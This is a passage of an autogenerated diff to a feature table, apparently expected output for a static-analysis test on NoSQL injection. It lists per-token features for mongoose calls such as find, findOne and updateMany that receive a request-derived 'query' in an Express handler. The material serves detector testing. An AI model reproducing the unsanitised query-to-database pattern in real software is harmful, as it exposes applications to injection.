autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:36:5:36:12 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:36:5:36:21 | Document.distinct | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:36:5:36:21 | Document.distinct | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:36:5:36:21 | Document.distinct | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:36:5:36:21 | Document.distinct | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:36:5:36:36 | Documen ... query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:36:5:36:36 | Documen ... query) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:36:5:36:36 | Documen ... query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:36:5:36:36 | Documen ... query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:36:5:36:36 | exceptional return of Documen ... query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:36:5:36:36 | exceptional return of Documen ... query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:36:5:36:36 | exceptional return of Documen ... query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:36:5:36:36 | exceptional return of Documen ... query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:36:14:36:21 | distinct | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:36:14:36:21 | distinct | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:36:14:36:21 | distinct | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:36:14:36:21 | distinct | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:36:23:36:28 | 'type' | CalleeFlexibleAccessPath | Document.distinct | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:36:23:36:28 | 'type' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:36:23:36:28 | 'type' | calleeImports | mongoose | @@ -2280,6 +12067,26 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:36:31:36:35 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:36:31:36:35 | query | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:36:31:36:35 | query | receiverName | Document | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:39:5:39:12 | Document | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:39:5:39:12 | Document | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:39:5:39:12 | Document | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:39:5:39:12 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:39:5:39:17 | Document.find | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:39:5:39:17 | Document.find | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:39:5:39:17 | Document.find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:39:5:39:17 | Document.find | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:39:5:39:24 | Document.find(query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:39:5:39:24 | Document.find(query) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:39:5:39:24 | Document.find(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:39:5:39:24 | Document.find(query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:39:5:39:24 | exceptional return of Document.find(query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:39:5:39:24 | exceptional return of Document.find(query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:39:5:39:24 | exceptional return of Document.find(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:39:5:39:24 | exceptional return of Document.find(query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:39:14:39:17 | find | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:39:14:39:17 | find | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:39:14:39:17 | find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:39:14:39:17 | find | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:39:19:39:23 | query | CalleeFlexibleAccessPath | Document.find | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:39:19:39:23 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:39:19:39:23 | query | calleeImports | mongoose | @@ -2288,6 +12095,26 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:39:19:39:23 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:39:19:39:23 | query | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:39:19:39:23 | query | receiverName | Document | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:42:5:42:12 | Document | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:42:5:42:12 | Document | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:42:5:42:12 | Document | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:42:5:42:12 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:42:5:42:20 | Document.findOne | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:42:5:42:20 | Document.findOne | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:42:5:42:20 | Document.findOne | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:42:5:42:20 | Document.findOne | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:42:5:42:27 | Documen ... (query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:42:5:42:27 | Documen ... (query) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:42:5:42:27 | Documen ... (query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:42:5:42:27 | Documen ... (query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:42:5:42:27 | exceptional return of Documen ... (query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:42:5:42:27 | exceptional return of Documen ... (query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:42:5:42:27 | exceptional return of Documen ... (query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:42:5:42:27 | exceptional return of Documen ... (query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:42:14:42:20 | findOne | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:42:14:42:20 | findOne | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:42:14:42:20 | findOne | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:42:14:42:20 | findOne | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:42:22:42:26 | query | CalleeFlexibleAccessPath | Document.findOne | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:42:22:42:26 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:42:22:42:26 | query | calleeImports | mongoose | @@ -2296,6 +12123,26 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:42:22:42:26 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:42:22:42:26 | query | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:42:22:42:26 | query | receiverName | Document | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:45:5:45:12 | Document | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:45:5:45:12 | Document | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:45:5:45:12 | Document | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:45:5:45:12 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:45:5:45:29 | Documen ... dDelete | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:45:5:45:29 | Documen ... dDelete | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:45:5:45:29 | Documen ... dDelete | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:45:5:45:29 | Documen ... dDelete | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:45:5:45:36 | Documen ... (query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:45:5:45:36 | Documen ... (query) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:45:5:45:36 | Documen ... (query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:45:5:45:36 | Documen ... (query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:45:5:45:36 | exceptional return of Documen ... (query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:45:5:45:36 | exceptional return of Documen ... (query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:45:5:45:36 | exceptional return of Documen ... (query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:45:5:45:36 | exceptional return of Documen ... (query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:45:14:45:29 | findOneAndDelete | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:45:14:45:29 | findOneAndDelete | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:45:14:45:29 | findOneAndDelete | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:45:14:45:29 | findOneAndDelete | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:45:31:45:35 | query | CalleeFlexibleAccessPath | Document.findOneAndDelete | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:45:31:45:35 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:45:31:45:35 | query | calleeImports | mongoose | @@ -2304,6 +12151,26 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:45:31:45:35 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:45:31:45:35 | query | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:45:31:45:35 | query | receiverName | Document | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:48:5:48:12 | Document | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:48:5:48:12 | Document | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:48:5:48:12 | Document | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:48:5:48:12 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:48:5:48:29 | Documen ... dRemove | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:48:5:48:29 | Documen ... dRemove | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:48:5:48:29 | Documen ... dRemove | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:48:5:48:29 | Documen ... dRemove | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:48:5:48:36 | Documen ... (query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:48:5:48:36 | Documen ... (query) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:48:5:48:36 | Documen ... (query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:48:5:48:36 | Documen ... (query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:48:5:48:36 | exceptional return of Documen ... (query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:48:5:48:36 | exceptional return of Documen ... (query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:48:5:48:36 | exceptional return of Documen ... (query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:48:5:48:36 | exceptional return of Documen ... (query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:48:14:48:29 | findOneAndRemove | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:48:14:48:29 | findOneAndRemove | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:48:14:48:29 | findOneAndRemove | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:48:14:48:29 | findOneAndRemove | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:48:31:48:35 | query | CalleeFlexibleAccessPath | Document.findOneAndRemove | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:48:31:48:35 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:48:31:48:35 | query | calleeImports | mongoose | @@ -2312,6 +12179,26 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:48:31:48:35 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:48:31:48:35 | query | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:48:31:48:35 | query | receiverName | Document | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:51:5:51:12 | Document | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:51:5:51:12 | Document | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:51:5:51:12 | Document | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:51:5:51:12 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:51:5:51:29 | Documen ... dUpdate | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:51:5:51:29 | Documen ... dUpdate | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:51:5:51:29 | Documen ... dUpdate | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:51:5:51:29 | Documen ... dUpdate | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:51:5:51:36 | Documen ... (query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:51:5:51:36 | Documen ... (query) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:51:5:51:36 | Documen ... (query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:51:5:51:36 | Documen ... (query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:51:5:51:36 | exceptional return of Documen ... (query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:51:5:51:36 | exceptional return of Documen ... (query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:51:5:51:36 | exceptional return of Documen ... (query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:51:5:51:36 | exceptional return of Documen ... (query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:51:14:51:29 | findOneAndUpdate | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:51:14:51:29 | findOneAndUpdate | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:51:14:51:29 | findOneAndUpdate | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:51:14:51:29 | findOneAndUpdate | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:51:31:51:35 | query | CalleeFlexibleAccessPath | Document.findOneAndUpdate | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:51:31:51:35 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:51:31:51:35 | query | calleeImports | mongoose | @@ -2320,6 +12207,26 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:51:31:51:35 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:51:31:51:35 | query | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:51:31:51:35 | query | receiverName | Document | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:54:5:54:12 | Document | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:54:5:54:12 | Document | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:54:5:54:12 | Document | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:54:5:54:12 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:54:5:54:23 | Document.replaceOne | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:54:5:54:23 | Document.replaceOne | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:54:5:54:23 | Document.replaceOne | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:54:5:54:23 | Document.replaceOne | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:54:5:54:30 | Documen ... (query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:54:5:54:30 | Documen ... (query) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:54:5:54:30 | Documen ... (query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:54:5:54:30 | Documen ... (query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:54:5:54:30 | exceptional return of Documen ... (query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:54:5:54:30 | exceptional return of Documen ... (query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:54:5:54:30 | exceptional return of Documen ... (query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:54:5:54:30 | exceptional return of Documen ... (query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:54:14:54:23 | replaceOne | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:54:14:54:23 | replaceOne | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:54:14:54:23 | replaceOne | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:54:14:54:23 | replaceOne | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:54:25:54:29 | query | CalleeFlexibleAccessPath | Document.replaceOne | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:54:25:54:29 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:54:25:54:29 | query | calleeImports | mongoose | @@ -2328,6 +12235,26 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:54:25:54:29 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:54:25:54:29 | query | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:54:25:54:29 | query | receiverName | Document | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:57:5:57:12 | Document | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:57:5:57:12 | Document | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:57:5:57:12 | Document | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:57:5:57:12 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:57:5:57:19 | Document.update | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:57:5:57:19 | Document.update | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:57:5:57:19 | Document.update | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:57:5:57:19 | Document.update | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:57:5:57:26 | Documen ... (query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:57:5:57:26 | Documen ... (query) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:57:5:57:26 | Documen ... (query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:57:5:57:26 | Documen ... (query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:57:5:57:26 | exceptional return of Documen ... (query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:57:5:57:26 | exceptional return of Documen ... (query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:57:5:57:26 | exceptional return of Documen ... (query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:57:5:57:26 | exceptional return of Documen ... (query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:57:14:57:19 | update | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:57:14:57:19 | update | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:57:14:57:19 | update | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:57:14:57:19 | update | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:57:21:57:25 | query | CalleeFlexibleAccessPath | Document.update | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:57:21:57:25 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:57:21:57:25 | query | calleeImports | mongoose | @@ -2336,6 +12263,26 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:57:21:57:25 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:57:21:57:25 | query | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:57:21:57:25 | query | receiverName | Document | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:60:5:60:12 | Document | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:60:5:60:12 | Document | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:60:5:60:12 | Document | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:60:5:60:12 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:60:5:60:23 | Document.updateMany | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:60:5:60:23 | Document.updateMany | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:60:5:60:23 | Document.updateMany | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:60:5:60:23 | Document.updateMany | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:60:5:60:30 | Documen ... (query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:60:5:60:30 | Documen ... (query) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:60:5:60:30 | Documen ... (query) | 